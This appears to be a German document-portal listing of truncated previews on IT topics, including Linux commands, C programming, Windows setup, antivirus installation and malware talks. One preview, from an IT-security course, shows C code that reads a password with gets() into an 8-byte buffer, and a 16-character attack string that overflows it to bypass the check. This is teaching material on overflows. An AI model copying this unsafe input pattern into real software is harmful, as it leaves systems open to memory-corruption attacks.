Freelance 2000. DeltaPLC-Tool. Version 4 / Version 5 Freelance 2000 DeltaPLC-Tool Version 4 / Version 5 Inhaltsverzeichnis 1 Allgemeine Beschreibung... 5 2 Aufruf des DeltaPLC-Tool... 5 3 Vergleich der PLC-Dateien... 6 4 Konfigurationsänderungen... 7 5

Mehr

Benutzer- und Datensicherheit. Ralf Abramowitsch Vector Informatik GmbH abramowitsch@lehre.dhbw-stuttgart.de

Benutzer- und Datensicherheit. Ralf Abramowitsch Vector Informatik GmbH abramowitsch@lehre.dhbw-stuttgart.de Benutzer- und Datensicherheit Ralf Abramowitsch Vector Informatik GmbH abramowitsch@lehre.dhbw-stuttgart.de Authentifizierung vs. Autorisierung IIdentity vs. IPrincipal Verschlüsseln und Entschlüsseln

Mehr

Das neue Volume-Flag S (Scannen erforderlich)

Das neue Volume-Flag S (Scannen erforderlich) NetWorker 7.4.2 - Allgemein Tip 2, Seite 1/5 Das neue Volume-Flag S (Scannen erforderlich) Nach der Wiederherstellung des Bootstraps ist es sehr wahrscheinlich, daß die in ihm enthaltenen Informationen

Mehr

Smartphone-Sicherheit

Smartphone-Sicherheit Smartphone-Sicherheit Fokus: Verschlüsselung Das E-Government Innovationszentrum ist eine gemeinsame Einrichtung des Bundeskanzleramtes und der TU Graz Peter Teufl Wien, 15.03.2012 Inhalt EGIZ Themen Smartphone

Mehr

1 Linux-Befehlsübersicht

1 Linux-Befehlsübersicht 1 Linux-Befehlsübersicht 1.1 Dateiverwaltung ls Verzeichnisinhalt anzeigen (list) ls -l ausführliche Darstellung ls -a auch versteckte Dateien auisten ls -h verwende besser lesbare Einheiten (humanreadable,

Mehr

Hauptseminar Malicious Code: Viren, Würmer und Co.

Hauptseminar Malicious Code: Viren, Würmer und Co. Hauptseminar Malicious Code: Viren, Würmer und Co. Statische Programmanalyse Matthias Langhammer Technische Universität München,langhamm@in.tum.de Zusammenfassung Um ihre Existenz zu verschleiern enthalten

Mehr

VisiScan 2011 für cobra 2011 www.papyrus-gmbh.de

VisiScan 2011 für cobra 2011 www.papyrus-gmbh.de Überblick Mit VisiScan für cobra scannen Sie Adressen von Visitenkarten direkt in Ihre Adress PLUS- bzw. CRM-Datenbank. Unterstützte Programmversionen cobra Adress PLUS cobra Adress PLUS/CRM 2011 Ältere

Mehr

HiOPC Hirschmann Netzmanagement. Anforderungsformular für eine Lizenz. Order form for a license

HiOPC Hirschmann Netzmanagement. Anforderungsformular für eine Lizenz. Order form for a license HiOPC Hirschmann Netzmanagement Anforderungsformular für eine Lizenz Order form for a license Anforderungsformular für eine Lizenz Vielen Dank für Ihr Interesse an HiOPC, dem SNMP/OPC Gateway von Hirschmann

Mehr

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik Wo ist mein Geld? Identitätsmissbrauch im Online-Banking Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik C. Sorge 2 Überblick Rechner des Kunden Server der Bank

Mehr

KOBIL SecOVID Token III Manual

KOBIL SecOVID Token III Manual KOBIL SecOVID Token III Manual Einführung Vielen Dank, dass Sie sich für das KOBIL SecOVID Token entschieden haben. Mit dem SecOVID Token haben Sie ein handliches, einfach zu bedienendes Gerät zur universellen

Mehr

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit WINDOWS 7 Druckerkonfiguration - Systemsteuerung - Sicherheit Druckerverwaltung ab Seite 91 = Standarddrucker Druckaufträge verwalten ab Seite 96 Systemsteuerung ab Seite 97 System Information über das

Mehr

Angewandte IT-Sicherheit

Angewandte IT-Sicherheit Angewandte IT-Sicherheit Johannes Stüttgen Lehrstuhl für praktische Informatik I 30.11.2010 Lehrstuhl für praktische Informatik I Angewandte IT-Sicherheit 1 / 28 Aufgabe 1 Betrachten sie folgendes Programm:

Mehr

USB-Stick (USB-Stick größer 4G. Es ist eine größere Partition notwendig als die eines 4GB Rohlings, der mit NTFS formatiert wurde)

USB-Stick (USB-Stick größer 4G. Es ist eine größere Partition notwendig als die eines 4GB Rohlings, der mit NTFS formatiert wurde) Colorfly i106 Q1 System-Installations-Tutorial Hinweise vor der Installation / Hit for preparation: 准 备 事 项 : 外 接 键 盘 ( 配 套 的 磁 吸 式 键 盘 USB 键 盘 通 过 OTG 插 发 射 器 的 无 线 键 盘 都 可 ); U 盘 ( 大 于 4G 的 空 白 U 盘,

Mehr

ATB Ausbildung technische Berufe Ausbildungszentrum Klybeck

ATB Ausbildung technische Berufe Ausbildungszentrum Klybeck Inhaltsverzeichnis DOKUMENTATION SERVER INSTALLATION MIT WINDOWS 2000...1 Was ist ein Server...1 Aufbau des aprentas Servers...1 Materialliste:...1 Ablauf der Installation:...1 Die Installation:...1 Server

Mehr

3 Windows 7-Installation

3 Windows 7-Installation 3 Windows 7-Installation 3.1 Grundsätzlicher Installationsablauf In allen bisherigen Windows-Versionen begann der zeitaufwändige Installationsvorgang mit einem anfänglichen Textmodus-Installationsschritt,

Mehr

Viren, Würmer und Trojaner

Viren, Würmer und Trojaner von Daniel Borgmann PING e.v. Weiterbildungsveranstaltungen http://www.ping.de/ Inhaltsverzeichnis 1. Was ist ein Virus eigentlich? 2. Wie fing das alles an? 3. Wie kann sich mein Computer infizieren?

Mehr

AVG Free 201X Installation Die Screenshots sind von der Version 2014, gelten aber sinngemäß auch für neuere Versionen.

AVG Free 201X Installation Die Screenshots sind von der Version 2014, gelten aber sinngemäß auch für neuere Versionen. AVG Free 201X Installation Die Screenshots sind von der Version 2014, gelten aber sinngemäß auch für neuere Versionen. Installation: Die Installation beginnt mit dem Download von folgender Adresse: http://www.avg.com/de-de/free-antivirus-download

Mehr

Datenspooler Installationsanleitung Gültig ab Datenspooler-Version 2.2.20.X

Datenspooler Installationsanleitung Gültig ab Datenspooler-Version 2.2.20.X Datenspooler Installationsanleitung Gültig ab Datenspooler-Version 2.2.20.X Inhalt 1. Vorbedingungen... 4 2. Installation... 5 2.1. Umstellung von Datenspooler Version A.03.09 auf Datenspooler-Version

Mehr

Der MS-DOS Standardmonitor und Debugger DEBUG

Der MS-DOS Standardmonitor und Debugger DEBUG Einfache Assemblerprogrammierung mit DOS-DEBUG 1/7 Auf Personalcomputern kann in der Regel leicht eine einfache Umgebung zur Software-Entwicklung für die Intel Rechnerfamilie 80x86 eingerichtet werden.

Mehr

Python Programmierung. Dipl.-Ing.(FH) Volker Schepper

Python Programmierung. Dipl.-Ing.(FH) Volker Schepper Python Programmierung Kontaktdaten Homepage: http://wwwlehre.dhbw-stuttgart.de/~schepper/ Email: Volker. Schepper [A@T] yahoo.de Vorlesung Skriptsprachen Vorlesung: 06.03.2013 13.03.2013 20.03.2013 27.03.2013

Mehr

Grundlagen. Die Komponenten eines C Programms. Das erste Programm

Grundlagen. Die Komponenten eines C Programms. Das erste Programm Grundlagen 1. Die Komponenten eines C Programms 2. Ein Programm erzeugen und übersetzen 3. Variablen Deklarieren und Werte zuweisen 4. Zahlen eingeben mit der Tastatur 5. Arithmetische Ausdrücke und Berechnungen

Mehr

Advanced Programming in C

Advanced Programming in C Advanced Programming in C Pointer und Listen Institut für Numerische Simulation Rheinische Friedrich-Wilhelms-Universität Bonn Oktober 2013 Überblick 1 Variablen vs. Pointer - Statischer und dynamischer

Mehr

Einführung in die Informationstechnik. VII Handyviren Anonym im Netz surfen

Einführung in die Informationstechnik. VII Handyviren Anonym im Netz surfen Einführung in die Informationstechnik VII Handyviren Anonym im Netz surfen 2 Handyschadsoftware erster Handyvirus: 2004 für SymbianOS: Cabir Verbreitung über Bluetooth Ab Herbst 2004 Trojaner Mosquit.a:

Mehr

Buffer Overflow 1c) Angriffsstring: TTTTTTTTTTTTTTTT (16x) Beachte: Padding GCC-Compiler Zusatz: gcc O2 verhindert hier den Angriff (Code Optimierung)

Buffer Overflow 1c) Angriffsstring: TTTTTTTTTTTTTTTT (16x) Beachte: Padding GCC-Compiler Zusatz: gcc O2 verhindert hier den Angriff (Code Optimierung) Buffer Overflow 1c) 1 char passok='f'; 2 char password[8]; 3 printf( Passwort: ); 4 gets(password); 5 if(!strcmp(password, daspassw )){passok = 'T';} 6 if(passok=='t'){printf( %s, Willkommen! );} 7 else

Mehr

Gerd Armbruster Gerd.Armbruster@GMX.De

Gerd Armbruster Gerd.Armbruster@GMX.De Viren, Trojaner & Hacker - so schützen Sie Ihren PC Gerd Armbruster Gerd.Armbruster@GMX.De 100 Mio Sony Kunden gehackt Aktuell Alles 2011 Immer noch 2011 Geschäftsmodell Agenda! Sicherheit im Internet!

Mehr

Zugriff auf Firebird-Datenbanken mit PHP. Daniel de West DB-Campus-Treffen 15. Januar 2004

Zugriff auf Firebird-Datenbanken mit PHP. Daniel de West DB-Campus-Treffen 15. Januar 2004 Zugriff auf Firebird-Datenbanken mit PHP Daniel de West DB-Campus-Treffen 15. Januar 2004 Inhalt PHP und Firebird Die wichtigsten Befehle Verbindungsaufbau Übermitteln von Abfragen Beenden von Verbindungen

Mehr